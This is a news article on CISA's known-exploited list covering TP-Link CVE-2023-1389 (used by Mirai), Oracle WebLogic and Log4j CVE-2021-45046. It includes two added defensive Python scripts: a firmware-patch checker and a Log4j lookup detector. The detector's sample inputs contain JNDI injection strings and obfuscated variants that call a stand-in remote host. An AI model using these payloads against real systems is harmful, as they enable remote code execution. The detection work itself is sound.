Mirai Botnet Loves Exploiting Your Unpatched TP-Link Routers

The US government’s Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet.

The other two placed on the list this week involve versions of Oracle’s WebLogic Server software and the Apache Foundation’s Log4j Java logging library.

The command-injection flaw in TP-Link’s Archer AX21 Wi-Fi 6 routers – tracked as CVE-2023-1389 – lurks in device firmware prior to version 1.1.4 Build 20230219, which addresses the issue. An unauthorized attacker can exploit this hole to inject commands that could lead to remote code execution (RCE), enabling the intruder to take control of the device from across the network or internet.

Trend Micro’s Zero Day Initiative (ZDI) threat-hunting group early last week wrote in a report that in mid-April miscreants behind the please-can’t-it-just-die Mirai botnet were beginning to exploit the flaw primarily by attacking devices in Eastern Europe, though the campaign soon expanded beyond that region.

The Mirai malware rolls up infected Linux-based Internet of Things (IoT) devices into a botnet that can then be remotely controlled to perform large-scale network attacks, including distributed denial-of-service (DDoS) assaults.

The command-injection vulnerability was found by several teams participating in ZDI’s Pwn2Own Toronto contest last year, and, as we said, TP-Link has since issued firmware to fix the issue. After hearing from ZDI that the Mirai botnet operators were trying to exploit it, TP-Link issued a statement urging users to install the updated firmware.

For devices linked to a TP-Link Cloud account, the firmware was updated automatically. Other users need to update the routers themselves.
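Since users without a TP-Link Cloud account must check and update their own devices, here is an added Python inventory check (not code from the article, TP-Link, or ZDI) that parses firmware strings of the "1.1.4 Build 20230219" form and compares them against the fixed build named above. The firmware-string shape, the inventory rows, hostnames, and the `rel.` suffix are all assumptions constructed for this example; the comparison is only meaningful for the Archer AX21, so other models are skipped.

```python
import re
from typing import Optional, Tuple

# Fixed firmware for the Archer AX21 as stated in the article (CVE-2023-1389).
FIXED_VERSION = "1.1.4 Build 20230219"

# Assumed firmware string shape: "<dotted version> Build <YYYYMMDD> [anything]".
VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)\s*Build\s*(\d{8})", re.IGNORECASE)

ParsedVersion = Tuple[Tuple[int, ...], int]


def parse_version(text: str) -> Optional[ParsedVersion]:
    """Turn a firmware string into a comparable (dotted-version, build-date) pair."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    dotted = tuple(int(part) for part in m.group(1).split("."))
    return dotted, int(m.group(2))


def is_vulnerable(version_text: str) -> Optional[bool]:
    """True if older than the fixed build, False if fixed or newer,
    None if the string cannot be parsed (treat as needing manual review)."""
    parsed = parse_version(version_text)
    if parsed is None:
        return None
    return parsed < parse_version(FIXED_VERSION)


# Constructed inventory records for this example, not real devices.
INVENTORY = [
    {"host": "rtr-branch-01", "model": "Archer AX21", "firmware": "1.1.3 Build 20220902 rel.58211"},
    {"host": "rtr-branch-02", "model": "Archer AX21", "firmware": "1.1.4 Build 20230219 rel.50702"},
    {"host": "rtr-branch-03", "model": "Archer AX21", "firmware": "unknown"},
    {"host": "rtr-lab-01", "model": "other-model", "firmware": "1.0.9 Build 20220830"},
]


def triage(inventory, model: str = "Archer AX21") -> dict:
    """Bucket inventory rows for one model by patch state."""
    buckets = {"vulnerable": [], "fixed": [], "review": []}
    for row in inventory:
        if row["model"] != model:
            continue  # the fixed-version comparison only holds for this model
        state = is_vulnerable(row["firmware"])
        key = "review" if state is None else ("vulnerable" if state else "fixed")
        buckets[key].append(row["host"])
    return buckets


if __name__ == "__main__":
    for bucket, hosts in triage(INVENTORY).items():
        print(f"{bucket:>10}: {', '.join(hosts) or '-'}")
```

Unparseable firmware strings land in a "review" bucket rather than being silently counted as patched; when an inventory tool cannot read a version, the safe assumption is that the device still needs a look.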

The ZDI researchers wrote that seeing the flaw being exploited so quickly after the patch was released is another example of the decreasing time between a vulnerability being found and exploitation attempts beginning.

“That said, this is nothing new for the maintainers of the Mirai botnet, who are known for quickly exploiting IoT devices to maintain their foothold in the enterprise,” they wrote.

Oracle, meanwhile, patched the CISA-highlighted vulnerability in its WebLogic Server software in January. The flaw, found in versions 12.2.1.2.0, 12.2.1.4.0, and 12.1.1.0.0 of WebLogic Server and tracked as CVE-2023-21839, is easily exploitable and could allow an unauthenticated attacker who has network access through T3 or IIOP protocols to compromise the server and gain access to data on the system.

There don’t appear to have been any active exploitation attempts against the RCE flaw over the past 30 days, according to GreyNoise, which collects and analyzes data from the internet. However, what helps make it such a threat is that no user interaction or authentication is needed for an intruder to grab control of a server.

In its patch update notice in January, Oracle gave a nod to several security researchers for alerting the database giant of the vulnerability.

We wish Log4j would jog on

The Apache flaw, tracked as CVE-2021-45046, involves the Log4j Java library, but is not the Log4j RCE vulnerability found around the same time (dubbed Log4Shell and published as CVE-2021-44228), which became such a threat to enterprises because of the library’s ubiquitous use in commercial and consumer services, products, websites, and applications worldwide.

The Log4j vulnerability cited this week by CISA is also an RCE flaw. According to the Apache Software Foundation and CISA, the fix for the Log4Shell vulnerability in Log4j 2.15.0 didn’t cover certain logging configurations that use a non-default Pattern Layout with a Context Lookup. Because of this, attackers who controlled the Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern.

That could lead to RCE and an information leak in some environments, and to local code execution in all environments. Log4j 2.16.0 (in Java 8) and 2.12.1 (Java 7) fix the issue by disabling JNDI by default and removing support for message lookup patterns.
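To make the mechanism above concrete from the defender’s side, here is an added Python detector (not code from the article, the Apache project, or CISA) that scans values headed for the MDC, or collected log lines, for Log4j lookup syntax. It first folds the `lower:`, `upper:` and `${name:-default}` wrappers that are used to disguise a `jndi:` lookup, then flags any risky lookup prefix that survives. The sample MDC values, the `lookup-target.example` host, and all function names are constructed for this example.

```python
import re

# Innermost ${...} group: a body containing no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# Lookup prefixes that should never appear in untrusted input. jndi is the
# dangerous one; the others show that someone is probing lookup evaluation.
RISKY_PREFIXES = ("jndi", "env", "sys", "ctx", "java", "main")

FLAG_RE = re.compile(r"\$\{\s*(" + "|".join(RISKY_PREFIXES) + r")\s*:", re.IGNORECASE)


def resolve_wrapper(body: str):
    """Collapse the cheap obfuscation wrappers seen around jndi lookups.

    Returns the literal text Log4j would substitute for the wrapper, or None
    when the body is a real lookup that must stay visible to the scanner.
    """
    prefix, sep, rest = body.partition(":")
    key = prefix.strip().lower()
    if key == "jndi":
        return None                    # keep the real lookup in place
    if sep and key == "lower":
        return rest.lower()            # ${lower:J} -> j
    if sep and key == "upper":
        return rest.upper()            # ${upper:j} -> J
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${unknown:-j} -> j (default value)
    return None                        # ${amount} etc.: not a wrapper we fold


def normalize(text: str, max_rounds: int = 20) -> str:
    """Fold nested wrappers from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def fold(match):
            nonlocal changed
            folded = resolve_wrapper(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        text = INNERMOST.sub(fold, text)
        if not changed:
            break
    return text


def scan_value(value: str) -> dict:
    """Classify one untrusted value (an MDC entry or a whole log line)."""
    normalized = normalize(value)
    lookups = [m.group(1).lower() for m in FLAG_RE.finditer(normalized)]
    return {
        "raw": value,
        "normalized": normalized,
        "lookups": lookups,
        "has_lookup_syntax": "${" in value,
        "suspicious": bool(lookups),
    }


def suspicious_values(values):
    """Return the scan results for values that carry a risky lookup after folding."""
    return [r for r in map(scan_value, values) if r["suspicious"]]


# Constructed MDC values for a hypothetical "loginId" field, not real traffic.
SAMPLE_MDC_VALUES = [
    "alice",
    "${jndi:ldap://lookup-target.example/a}",
    "${${lower:J}${lower:N}di:ldap://lookup-target.example/a}",
    "${${::-j}ndi:rmi://lookup-target.example/x}",
    "${${env:NOPE:-j}ndi:ldap://lookup-target.example/a}",
    "price is ${amount}",
]


if __name__ == "__main__":
    for result in map(scan_value, SAMPLE_MDC_VALUES):
        tag = "ALERT" if result["suspicious"] else "ok   "
        print(f"{tag} {result['raw']!r} -> {result['normalized']!r} {result['lookups']}")
```

The folding step is what matters: a naive search for the literal string `${jndi:` misses three of the four constructed malicious values, while the normalized form exposes all of them. Plain `${...}` text without a risky prefix is reported via `has_lookup_syntax` but not treated as an alert, which keeps ordinary template-like strings from drowning the signal.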

In December 2021 CISA, the FBI, and security agencies in such countries as Australia, Canada, and the UK warned that miscreants were actively exploiting both Log4j vulnerabilities. GreyNoise found indications that both holes were being targeted over the past 30 days by as many as 74 unique IPs, though it’s unknown how many were related to CVE-2021-45046. ®
